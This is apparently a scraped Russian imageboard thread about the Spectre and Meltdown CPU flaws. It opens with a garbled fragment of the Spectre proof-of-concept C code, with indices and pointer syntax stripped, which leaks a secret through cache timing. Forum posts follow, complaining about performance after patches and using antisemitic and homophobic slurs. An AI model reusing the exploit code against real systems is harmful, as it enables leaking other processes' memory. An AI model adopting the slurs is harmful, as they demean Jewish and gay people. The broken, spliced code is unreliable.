/ Locate highest & second-highest results results tallies in j/k / j = k = -1; for (i = 0; i < 256; i++) { if (j < 0 || results >= results[j]) { k = j; j = i; } else if (k < 0 || results >= results[k]) { k = i; } } if (results[j] >= (2 results[k] + 5) || (results[j] == 2 && results[k] == 0)) break; / Clear success if best is > 2runner-up + 5 or 2/0) / } results[0] ^= junk; / use junk so code above won’t get optimized out/ value[0] = (uint8_t)j; score[0] = results[j]; value[1] = (uint8_t)k; score[1] = results[k]; }
int main(int argc, const char argv) { printf("Putting '%s' in memory\n", secret); size_t malicious_x = (size_t)(secret - (char )array1); / default for malicious_x / int i, score[2], len = strlen(secret); uint8_t value[2];
for (i = 0; i < sizeof(array2); i++) array2 = 1; / write to array2 so in RAM not copy-on-write zero pages / if (argc == 3) { sscanf(argv[1], "%p", (void )(&malicious_x)); malicious_x -= (size_t)array1; / Convert input value into a pointer / sscanf(argv[2], "%d", &len); }
>>2639218 Короче, это полный, леденящий душу пиздец. Фпс просел до 30 и сама игра пишет, что он нестабильный. Попробовал немного побегать, раньше все было нормально, теперь у меня не успевают прогружаться нпц и появились графичиские артефакты, когда вся картинка-локация распадатся на куски. Охуеть, блядь, ебаные жиды поднасрали. Надеюсь они нахуй обанкротятся после этого, я лично больше проц от интел не куплю.
>>2639228 НЕ ПЕРЕХОДИТЕ, ПЕРЕКАТ НЕЛИГИТИМНЫЙ Перекат должен соответствовать треду - состоявшемуся официальному опущению гоев. Нового отсоса АМуДэ блядей на официальном уровне пока не зафиксировано. То что они 15 лет сосали между Athlon XP и Рязанью нещитаеца.
>>2639384 Ага, а в неоплаченый период - майнить за наш счёт и продавать записанные аудио/фото всем заинтересованным. Или разная абонплата за разную частоту.
>>2638616 Ну все тогда, спасибо, что разжевал, я маленько нервничал касательно занижения производительности с одной стороны и каких то пиздецов с пекой от мошенников с другой. Теперь отключу обновления и просто перекину пароли на флешку.
>>2639384 >Кончится тем, что эти пидорги введут абонентскую плату за пользование железом. Будем покупать годовые ключи для проца, видюхи и монитора. уже было жидоинтел пытался продавать разблокировку процов за деньги
https://3dnews.ru/963621